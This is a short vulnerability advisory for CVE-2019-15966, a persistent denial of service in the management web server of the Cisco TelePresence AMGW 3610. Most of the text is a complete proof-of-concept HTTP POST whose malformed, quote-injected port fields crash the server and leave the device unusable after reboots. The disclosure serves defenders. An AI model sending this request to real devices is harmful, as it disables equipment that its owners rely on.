Cisco TelePresence Advanced Media Gateway 3610 Denial of Service

CVE-2019-15966: HTTP Server Denial of Service

Cisco AMGW 3610 version 1.1(1.42) has a denial of service vulnerability which affects the management HTTP server. An authenticated user can send a malformed configuration request to the server to cause a segmentation fault. The configuration will persist through device reboots and cause the web server to be inaccessible, rendering the device unusable.

POST /settings_change_network_services.html HTTP/1.1
Host: w.x.y.z
Connection: close
Content-Length: 250
Cache-Control: max-age=0
Origin: https://w.x.y.z
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Referer: http://w.x.y.z/settings_services.html?services_updated=true
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cookie=abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijkl

http_enable_1=on'"&http_port_1=80'"&https_port_1=4443&sip_tcp_enable_1=on&sip_tcp_port_1=5060&sips_tcp_port_1=5061&ftp_enable_1=on&ftp_port_1=21&snmp_port_1=161&sip_udp_enable_1=on&sip_udp_port_1=5060&update_tcp_services=Apply+changes